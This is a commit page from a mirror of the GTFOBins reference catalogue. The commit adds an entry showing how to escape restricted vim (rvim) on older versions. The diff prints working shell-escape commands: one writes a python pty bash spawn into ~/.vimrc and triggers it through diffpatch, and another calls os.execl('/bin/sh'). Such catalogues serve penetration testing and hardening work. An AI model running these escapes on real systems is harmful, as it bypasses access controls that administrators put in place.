1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-27 09:36:03 +02:00

adds rvim redir and diffpatch trick

This commit is contained in:
Lucas VAN HAAREN 2023-09-25 16:18:01 +02:00
parent 72cb09f404
commit 1894142c8a
No known key found for this signature in database
GPG Key ID: C8B1B2810A4F3995

View File

@ -1,6 +1,8 @@
---
functions:
shell:
- description: This requires that `rvim` version is `< 9.0.1440`.
code: rvim -c ':redir! > ~/.vimrc | echo "!python3 -c \'import pty; pty.spawn(\"/bin/bash\")\'" | redir END | set shell=/usr/bin/vim | diffpatch'
- description: This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3.
code: rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
- description: This requires that `rvim` is compiled with Lua support.